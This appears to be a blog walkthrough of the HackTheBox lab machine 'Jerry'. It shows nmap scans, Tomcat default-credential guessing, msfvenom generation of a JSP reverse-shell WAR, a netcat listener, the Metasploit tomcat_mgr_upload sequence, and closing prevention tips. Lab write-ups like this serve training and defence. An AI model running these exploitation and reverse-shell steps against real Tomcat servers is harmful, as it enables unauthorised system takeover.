Post

Jerry - HackTheBox Walkthrough

Posted
By Ranger
2 min read
Jerry - HackTheBox Walkthrough

Box Info

  • Name: Jerry
  • OS: Windows
  • Difficulty: Easy
  • IP: 10.10.10.95
  • Release Date: June 2018

Summary

Jerry is an easy Windows box featuring an Apache Tomcat server with default credentials. By exploiting the manager interface with known credentials, we can upload a malicious WAR file to gain immediate SYSTEM-level access.

Reconnaissance

Nmap Scan

1

sudo nmap -sC -sV -oN Jerry.nmap 10.10.10.95

Results:

  • Port 8080 - Apache Tomcat 7.0.88

A full TCP scan confirms no additional ports are open:

1

nmap -p- --min-rate=1000 10.10.10.95

Service Analysis

  • Single attack surface: Tomcat web server
  • Version 7.0.88 is vulnerable to authenticated code execution
  • Manager interface accessible at /manager/html

Enumeration

Tomcat Manager Access

Navigate to:

1

http://10.10.10.95:8080/manager/html

The browser prompts for credentials. Testing default Tomcat credentials:

UsernamePasswordResult
tomcattomcatFailed
adminadminFailed
tomcats3cretSuccess

Default credentials work: tomcat:s3cret

Exploitation

Method 1: Manual WAR Upload

  1. Generate reverse shell payload:
1

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war -o shell.war
  1. Start listener:
1

nc -lvnp 4444
  1. Deploy WAR file:
    • Login to Tomcat Manager with tomcat:s3cret
    • Scroll to “WAR file to deploy” section
    • Click “Browse” and select shell.war
    • Click “Deploy”
  2. Trigger payload:
1

http://10.10.10.95:8080/shell/

Result: Reverse shell with NT Authority\SYSTEM privileges!

Method 2: Metasploit

1
2
3
4
5
6
7
8
9

msfconsole
use exploit/multi/http/tomcat_mgr_upload
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set RHOSTS 10.10.10.95
set HTTPUSERNAME tomcat
set HTTPPASSWORD s3cret
set RPORT 8080
exploit

Privilege Escalation

Not required!

The Tomcat service runs as NT Authority\SYSTEM, giving us the highest Windows privilege level immediately upon exploitation.

1
2

C:\apache-tomcat-7.0.88>whoami
nt authority\system

Flags

Both user and root flags are located in the same directory:

1

C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt

1

type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"

Key Takeaways

  1. Default Credentials - Always test common/default credentials on known services
  2. Service Identification - Tomcat version revealed attack vector
  3. WAR File Upload - Standard Tomcat exploitation technique
  4. Privilege Configuration - Services running as SYSTEM = instant win

Tools Used

  • nmap - Port scanning and service detection
  • msfvenom - Payload generation
  • netcat - Reverse shell listener
  • Metasploit (optional) - Automated exploitation

Prevention

  • Change default credentials immediately after installation
  • Restrict manager interface access (IP whitelist)
  • Run Tomcat with least-privilege service account
  • Keep Tomcat updated to latest version
  • Monitor for unauthorized WAR deployments

Difficulty: Easy Time to root: ~15 minutes Key vulnerability: Default credentials + authenticated WAR upload

HackTheBox, Easy
htb windows tomcat default-credentials war-upload
This post is licensed under CC BY 4.0 by the author.